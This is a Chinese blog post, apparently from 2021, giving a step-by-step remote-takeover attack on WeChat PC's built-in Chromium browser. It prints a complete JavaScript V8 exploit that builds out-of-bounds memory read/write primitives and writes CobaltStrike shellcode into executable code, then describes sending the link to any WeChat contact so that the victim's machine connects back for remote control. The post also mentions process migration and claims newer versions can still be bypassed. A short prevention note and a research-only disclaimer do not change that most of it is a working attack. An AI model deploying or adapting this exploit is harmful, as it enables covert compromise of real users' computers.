利用微信内置浏览器Chrome漏洞实现远控

2021-04-17 2446阅读 0评论

环境:微信PC版本3.2.1.112
利用微信内置浏览器Chrome漏洞实现远控,利用微信内置浏览器Chrome漏洞实现远控 漏洞 移动互联网 nbsp function 微信 addr 浏览器 第1张,利用微信内置浏览器Chrome漏洞实现远控,漏洞,移动互联网,IT 屋,function,微信,addr,浏览器,第1张
利用步骤:
1.首先使用CobaltStrike生成一个x86格式的shellcode。
利用微信内置浏览器Chrome漏洞实现远控,利用微信内置浏览器Chrome漏洞实现远控 漏洞 移动互联网 nbsp function 微信 addr 浏览器 第2张,利用微信内置浏览器Chrome漏洞实现远控,漏洞,移动互联网,IT 屋,function,微信,addr,浏览器,第2张
2.搭建一个测试网站,将下方0day poc放入。
利用微信内置浏览器Chrome漏洞实现远控,利用微信内置浏览器Chrome漏洞实现远控 漏洞 移动互联网 nbsp function 微信 addr 浏览器 第3张,利用微信内置浏览器Chrome漏洞实现远控,漏洞,移动互联网,IT 屋,function,微信,addr,浏览器,第3张
利用微信内置浏览器Chrome漏洞实现远控,利用微信内置浏览器Chrome漏洞实现远控 漏洞 移动互联网 nbsp function 微信 addr 浏览器 第4张,利用微信内置浏览器Chrome漏洞实现远控,漏洞,移动互联网,IT 屋,function,微信,addr,浏览器,第4张

ENABLE_LOG = true;
IN_WORKER = true;// run calc and hang in a loopvar shellcode = [shellcode];//shellcode替换成自己的function print(data) {
}var not_optimised_out = 0;var target_function = (function (value) {    if (value == 0xdecaf0) {
        not_optimised_out += 1;
    }
    not_optimised_out += 1;
    not_optimised_out |= 0xff;
    not_optimised_out *= 12;
});for (var i = 0; i < 0x10000; ++i) {
    target_function(i);
}var g_array;var tDerivedNCount = 17 * 87481 - 8;var tDerivedNDepth = 19 * 19;function cb(flag) {    if (flag == true) {        return;
    }
    g_array = new Array(0);
    g_array[0] = 0x1dbabe * 2;    return 'c01db33f';
}function gc() {    for (var i = 0; i < 0x10000; ++i) {        new String();
    }
}function oobAccess() {    var this_ = this;    this.buffer = null;    this.buffer_view = null;    this.page_buffer = null;    this.page_view = null;    this.prevent_opt = [];    var kSlotOffset = 0x1f;    var kBackingStoreOffset = 0xf;    class LeakArrayBuffer extends ArrayBuffer {        constructor() {            super(0x1000);            this.slot = this;
        }
    }    this.page_buffer = new LeakArrayBuffer();    this.page_view = new DataView(this.page_buffer);    new RegExp({ toString: function () { return 'a' } });
    cb(true);    class DerivedBase extends RegExp {        constructor() {            // var array = null;
            super(                // at this point, the 4-byte allocation for the JSRegExp `this` object
                // has just happened.
                {                    toString: cb
                }, 'g'
                // now the runtime JSRegExp constructor is called, corrupting the
                // JSArray.
            );            // this allocation will now directly follow the FixedArray allocation
            // made for `this.data`, which is where `array.elements` points to.
            this_.buffer = new ArrayBuffer(0x80);
            g_array[8] = this_.page_buffer;
        }
    }    // try{
    var derived_n = eval(`(function derived_n(i) {
        if (i == 0) {
            return DerivedBase;
        }

        class DerivedN extends derived_n(i-1) {
            constructor() {
                super();
                return;                ${"this.a=0;".repeat(tDerivedNCount)}
            }
        }

        return DerivedN;
    })`);

    gc();    new (derived_n(tDerivedNDepth))();    this.buffer_view = new DataView(this.buffer);    this.leakPtr = function (obj) {        this.page_buffer.slot = obj;        return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);
    }    this.setPtr = function (addr) {        this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);
    }    this.read32 = function (addr) {        this.setPtr(addr);        return this.page_view.getUint32(0, true, ...this.prevent_opt);
    }    this.write32 = function (addr, value) {        this.setPtr(addr);        this.page_view.setUint32(0, value, true, ...this.prevent_opt);
    }    this.write8 = function (addr, value) {        this.setPtr(addr);        this.page_view.setUint8(0, value, ...this.prevent_opt);
    }    this.setBytes = function (addr, content) {        for (var i = 0; i < content.length; i++) {            this.write8(addr + i, content[i]);
        }
    }    return this;
}function trigger() {    var oob = oobAccess();    var func_ptr = oob.leakPtr(target_function);
    print('[*] target_function at 0x' + func_ptr.toString(16));    var kCodeInsOffset = 0x1b;    var code_addr = oob.read32(func_ptr + kCodeInsOffset);
    print('[*] code_addr at 0x' + code_addr.toString(16));

    oob.setBytes(code_addr, shellcode);

    target_function(0);
}try{
    print("start running");
    trigger();
}catch(e){
    print(e);
}

End... 复制

3.微信发送给任意好友,在pc端用内置浏览器打开url即可成功上线。
利用微信内置浏览器Chrome漏洞实现远控,利用微信内置浏览器Chrome漏洞实现远控 漏洞 移动互联网 nbsp function 微信 addr 浏览器 第5张,利用微信内置浏览器Chrome漏洞实现远控,漏洞,移动互联网,IT 屋,function,微信,addr,浏览器,第5张

利用微信内置浏览器Chrome漏洞实现远控,利用微信内置浏览器Chrome漏洞实现远控 漏洞 移动互联网 nbsp function 微信 addr 浏览器 第6张,利用微信内置浏览器Chrome漏洞实现远控,漏洞,移动互联网,IT 屋,function,微信,addr,浏览器,第6张
4.使用CobaltStrike工具即可实现远控等一系列操作,CobaltStrike简介及使用教程请看我的另一篇文章:https://xxkblog.cn/blog/552.html

漏洞产生原因:
微信内置浏览器为QQ浏览器,QQ浏览器使用chrome内核且沙箱处于关闭状态。

注:微信关闭网页shell会掉问题,可进程迁移解决。

影响范围:
微信PC版:3.2.1.141版本及以下
使用chrome内核89.0.4389.114以下版本的浏览器(edge,360浏览器,google chrome,谷歌浏览器等)

预防措施:
将微信升级至3.2.1.141版本以上,不点击陌生链接。

截至发文日期:2021.4.17,最新版微信内核仍未更新,仍然可以使用其他手段来绕过,从而实现远控!利用微信内置浏览器Chrome漏洞实现远控,利用微信内置浏览器Chrome漏洞实现远控 漏洞 移动互联网 nbsp function 微信 addr 浏览器 第7张,利用微信内置浏览器Chrome漏洞实现远控,漏洞,移动互联网,IT 屋,function,微信,addr,浏览器,第7张

本文提供的poc仅供技术研究使用,请勿非法使用。
本文部分内容参考靓仔Jaky的公众号文章,在此特别感谢靓仔。


版权声明
  本站致力于为模板爱好者提供国内外插件开发技术和模板共享,着力为用户提供优资资源。
  本站提供的所有下载文件均为网络共享资源,请于下载后的24小时内删除。如需体验更多乐趣,还请支持正版。
  我站提供用户下载的所有内容均转自互联网。如有内容侵犯您的版权或其他利益的,请编辑邮件并加以说明发送到站长邮箱。
  站长会进行审查之后,情况属实的会在三个工作日内为您删除。

发表评论

快捷回复: 表情:
评论列表 (暂无评论,2446人围观)

还没有评论,来说两句吧...

取消
微信二维码
微信二维码
支付宝二维码